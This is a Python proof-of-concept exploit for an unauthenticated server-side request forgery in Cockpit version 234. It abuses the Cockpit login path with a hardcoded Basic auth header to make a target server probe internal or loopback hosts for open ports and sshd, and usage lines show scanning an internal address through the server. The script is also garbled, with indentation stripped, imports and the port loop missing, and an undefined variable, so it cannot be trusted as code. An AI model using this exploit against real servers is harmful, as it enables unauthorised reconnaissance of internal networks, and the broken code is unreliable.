from colorama import Fore, Style
from argparse import ArgumentParser, Namespace
from bs4 import BeautifulSoup
Example scanning for internal server:
python3 PoC.py --target 192.168.1.33:9090 --scan 172.16.16.16 --ports 21,22,23
Example scanning for loopback interface of server:
python3 PoC.py --target 192.168.1.33:9090
Description : https://github.com/passtheticket/vulnerability-research/tree/main/cockpitProject/README.md
dsc = "Cockpit Version 234 - sshd Service Scanning via Server-Side Request Forgery (Unauthenticated)"
parser: ArgumentParser = argparse.ArgumentParser(description=dsc)
parser.add_argument("--target", help="IP address of Cockpit server", type=str, required=True)
parser.add_argument("--scan", help="IP address of server that will be scanned", type=str, required=False)
parser.add_argument("--ports", help="Ports (example: 21,22)", type=str, required=False)
args: Namespace = parser.parse_args()
cockpitReq(target, scan, ports)
def cockpitReq(target, scan, ports):
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
portRange = ports.split(",")
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0",
"Accept-Language": "en-US,en;q=0.5",
"Accept-Encoding": "gzip, deflate",
"Authorization": "Basic dW5zYWZlOmlubGluZQ==",
"Cookie": "cockpit=deleted",
req = requests.get("http://" + target + "/cockpit+=" + scan + ":" + unsafe + "/login", headers, verify=False)
soup = BeautifulSoup(req.text, 'html.parser')
responseCode = req.status_code
responseTime = str(req.elapsed)
print("Cockpit server was not found!")
elif responseCode == 401:
if soup.title.string == "Authentication failed":
print(Fore.GREEN + Style.BRIGHT + "[+] Port: "+ unsafe + " sshd service is detected!")
elif soup.title.string == "Authentication failed: no-host":
if responseTime > "0:00:10.000000":
print(Fore.GREEN + Style.BRIGHT +"[-] Port: "+ unsafe + " is open, sshd service is not detected!")
print(Fore.RED + Style.BRIGHT +"[-] Port: "+ unsafe + " sshd service is not detected!")
print(Fore.RED + Style.BRIGHT +"[-] Error is occured!")
print("[-] One bad day!")
print("Something went wrong!")